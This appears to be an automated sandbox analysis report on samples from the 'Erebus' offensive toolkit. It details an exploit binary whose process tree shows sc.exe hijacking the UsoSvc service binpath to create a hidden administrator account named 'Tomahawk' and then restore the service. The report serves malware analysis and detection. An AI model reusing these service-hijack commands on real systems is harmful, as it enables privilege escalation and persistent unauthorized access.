Overview
overview
8Static
static
7Erebus-mas...03.exe
windows7-x64
5Erebus-mas...03.exe
windows10-2004-x64
5Erebus-mas...64.dll
windows7-x64
1Erebus-mas...64.dll
windows10-2004-x64
1Erebus-mas...86.dll
windows7-x64
3Erebus-mas...86.dll
windows10-2004-x64
3Erebus-mas...64.exe
windows7-x64
1Erebus-mas...64.exe
windows10-2004-x64
1Erebus-mas...86.exe
windows7-x64
1Erebus-mas...86.exe
windows10-2004-x64
3Erebus-mas...64.exe
windows7-x64
8Erebus-mas...64.exe
windows10-2004-x64
8Erebus-mas...jp.exe
windows7-x64
1Erebus-mas...jp.exe
windows10-2004-x64
1Erebus-mas...sp.exe
windows7-x64
1Erebus-mas...sp.exe
windows10-2004-x64
1Erebus-mas...80.exe
windows7-x64
7Erebus-mas...80.exe
windows10-2004-x64
7Erebus-mas...es.exe
windows7-x64
7Erebus-mas...es.exe
windows10-2004-x64
7Erebus-mas...b.xlsx
windows7-x64
3Erebus-mas...b.xlsx
windows10-2004-x64
1Erebus-mas...ter.py
ubuntu-18.04-amd64
3Erebus-mas...ter.py
debian-9-armhf
3Erebus-mas...ter.py
debian-9-mips
3Erebus-mas...ter.py
debian-9-mipsel
3Erebus-mas...er.ps1
windows7-x64
3Erebus-mas...er.ps1
windows10-2004-x64
3Erebus-mas...to.exe
windows7-x64
1Erebus-mas...to.exe
windows10-2004-x64
1Erebus-mas...le.exe
windows7-x64
1Erebus-mas...le.exe
windows10-2004-x64
1Analysis
-
max time kernel
118s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20241023-en -
resource tags
arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system -
submitted
03/12/2024, 06:57
Behavioral task
behavioral1
Sample
Erebus-master/exp/0803.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Erebus-master/exp/0803.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Erebus-master/exp/16075/x64.dll
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
Erebus-master/exp/16075/x64.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
Erebus-master/exp/16075/x86.dll
Resource
win7-20241010-en
Behavioral task
behavioral6
Sample
Erebus-master/exp/16075/x86.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
Erebus-master/exp/8120/x64.exe
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
Erebus-master/exp/8120/x64.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
Erebus-master/exp/8120/x86.exe
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
Erebus-master/exp/8120/x86.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
Erebus-master/exp/com/1405_1322_x64.exe
Resource
win7-20241023-en
Behavioral task
behavioral12
Sample
Erebus-master/exp/com/1405_1322_x64.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral13
Sample
Erebus-master/exp/jp/jp.exe
Resource
win7-20241010-en
Behavioral task
behavioral14
Sample
Erebus-master/exp/jp/jp.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral15
Sample
Erebus-master/exp/sp/sp.exe
Resource
win7-20240903-en
Behavioral task
behavioral16
Sample
Erebus-master/exp/sp/sp.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral17
Sample
Erebus-master/gather/chrome80.exe
Resource
win7-20240903-en
Behavioral task
behavioral18
Sample
Erebus-master/gather/chrome80.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral19
Sample
Erebus-master/gather/cookies.exe
Resource
win7-20240903-en
Behavioral task
behavioral20
Sample
Erebus-master/gather/cookies.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral21
Sample
Erebus-master/local/2020-04-10-mssb.xlsx
Resource
win7-20240903-en
Behavioral task
behavioral22
Sample
Erebus-master/local/2020-04-10-mssb.xlsx
Resource
win10v2004-20241007-en
Behavioral task
behavioral23
Sample
Erebus-master/local/windows-exploit-suggester.py
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral24
Sample
Erebus-master/local/windows-exploit-suggester.py
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral25
Sample
Erebus-master/local/windows-exploit-suggester.py
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral26
Sample
Erebus-master/local/windows-exploit-suggester.py
Resource
debian9-mipsel-20240226-en
Behavioral task
behavioral27
Sample
Erebus-master/modules/gather.ps1
Resource
win7-20241023-en
Behavioral task
behavioral28
Sample
Erebus-master/modules/gather.ps1
Resource
win10v2004-20241007-en
Behavioral task
behavioral29
Sample
Erebus-master/post/BadPotato.exe
Resource
win7-20240903-en
Behavioral task
behavioral30
Sample
Erebus-master/post/BadPotato.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral31
Sample
Erebus-master/post/HiveJack-Console.exe
Resource
win7-20240708-en
Behavioral task
behavioral32
Sample
Erebus-master/post/HiveJack-Console.exe
Resource
win10v2004-20241007-en
General
-
Target
Erebus-master/exp/com/1405_1322_x64.exe
-
Size
132KB
-
MD5
2e2ddfd6d3a10d5dd51f8cbdeaeb4b75
-
SHA1
bf51231e74fe5ce86e612e8bec16bc555afb7d73
-
SHA256
85bd47cc708f80a3e9aebc5948404017053eec1c316f2c3b527011f19597ab1f
-
SHA512
ec9f48e571982954e98ecb76156c8c619a67c7c6dc75c3d1319ddd8fca992f4a47e86d0735882320ef4bc8ebca39c763f18e19981b7d50bb4c7db1563de90c25
-
SSDEEP
3072:0Ud3B51Sbph2PlpHyKE+LrmeTwMJV4NalCD:0Ix51SFA95yKEUxz
Malware Config
Signatures
-
Launches sc.exe 9 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3012 sc.exe 2892 sc.exe 2816 sc.exe 2720 sc.exe 2208 sc.exe 2544 sc.exe 2500 sc.exe 2832 sc.exe 2968 sc.exe -
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
Modifies data under HKEY_USERS 12 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" upnpcont.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" upnpcont.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" upnpcont.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft upnpcont.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion upnpcont.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows upnpcont.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Shell Extensions upnpcont.exe Set value (data) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{871C5380-42A0-1069-A2EA-08002B30309D} {000214E6-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000a0fcd19b5045db01 upnpcont.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ upnpcont.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" upnpcont.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached upnpcont.exe Key created \REGISTRY\USER\S-1-5-19\Software upnpcont.exe -
Suspicious use of WriteProcessMemory 27 IoCs
description pid Process procid_target PID 2328 wrote to memory of 2544 2328 upnpcont.exe 32 PID 2328 wrote to memory of 2544 2328 upnpcont.exe 32 PID 2328 wrote to memory of 2544 2328 upnpcont.exe 32 PID 2328 wrote to memory of 2500 2328 upnpcont.exe 35 PID 2328 wrote to memory of 2500 2328 upnpcont.exe 35 PID 2328 wrote to memory of 2500 2328 upnpcont.exe 35 PID 2328 wrote to memory of 2832 2328 upnpcont.exe 37 PID 2328 wrote to memory of 2832 2328 upnpcont.exe 37 PID 2328 wrote to memory of 2832 2328 upnpcont.exe 37 PID 2328 wrote to memory of 2968 2328 upnpcont.exe 39 PID 2328 wrote to memory of 2968 2328 upnpcont.exe 39 PID 2328 wrote to memory of 2968 2328 upnpcont.exe 39 PID 2328 wrote to memory of 3012 2328 upnpcont.exe 41 PID 2328 wrote to memory of 3012 2328 upnpcont.exe 41 PID 2328 wrote to memory of 3012 2328 upnpcont.exe 41 PID 2328 wrote to memory of 2892 2328 upnpcont.exe 43 PID 2328 wrote to memory of 2892 2328 upnpcont.exe 43 PID 2328 wrote to memory of 2892 2328 upnpcont.exe 43 PID 2328 wrote to memory of 2816 2328 upnpcont.exe 45 PID 2328 wrote to memory of 2816 2328 upnpcont.exe 45 PID 2328 wrote to memory of 2816 2328 upnpcont.exe 45 PID 2328 wrote to memory of 2720 2328 upnpcont.exe 47 PID 2328 wrote to memory of 2720 2328 upnpcont.exe 47 PID 2328 wrote to memory of 2720 2328 upnpcont.exe 47 PID 2328 wrote to memory of 2208 2328 upnpcont.exe 49 PID 2328 wrote to memory of 2208 2328 upnpcont.exe 49 PID 2328 wrote to memory of 2208 2328 upnpcont.exe 49
Processes
-
C:\Users\Admin\AppData\Local\Temp\Erebus-master\exp\com\1405_1322_x64.exe"C:\Users\Admin\AppData\Local\Temp\Erebus-master\exp\com\1405_1322_x64.exe"1⤵PID:3060
-
C:\Windows\system32\upnpcont.exeC:\Windows\system32\upnpcont.exe -Embedding1⤵
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:2328 -
C:\Windows\System32\sc.exe"C:\Windows\System32\sc.exe" stop UsoSvc2⤵
- Launches sc.exe
PID:2544
-
-
C:\Windows\System32\sc.exe"C:\Windows\System32\sc.exe" config UsoSvc binpath= "cmd.exe /c net user /add Tomahawk RibSt3ak69 &"2⤵
- Launches sc.exe
PID:2500
-
-
C:\Windows\System32\sc.exe"C:\Windows\System32\sc.exe" start UsoSvc2⤵
- Launches sc.exe
PID:2832
-
-
C:\Windows\System32\sc.exe"C:\Windows\System32\sc.exe" stop UsoSvc2⤵
- Launches sc.exe
PID:2968
-
-
C:\Windows\System32\sc.exe"C:\Windows\System32\sc.exe" config UsoSvc binpath= "cmd.exe /c net localgroup administrators /add Tomahawk & "2⤵
- Launches sc.exe
PID:3012
-
-
C:\Windows\System32\sc.exe"C:\Windows\System32\sc.exe" start UsoSvc2⤵
- Launches sc.exe
PID:2892
-
-
C:\Windows\System32\sc.exe"C:\Windows\System32\sc.exe" stop UsoSvc2⤵
- Launches sc.exe
PID:2816
-
-
C:\Windows\System32\sc.exe"C:\Windows\System32\sc.exe" config UsoSvc binpath= "C:\WINDOWS\system32\svchost.exe - k netsvcs - p"2⤵
- Launches sc.exe
PID:2720
-
-
C:\Windows\System32\sc.exe"C:\Windows\System32\sc.exe" start UsoSvc2⤵
- Launches sc.exe
PID:2208
-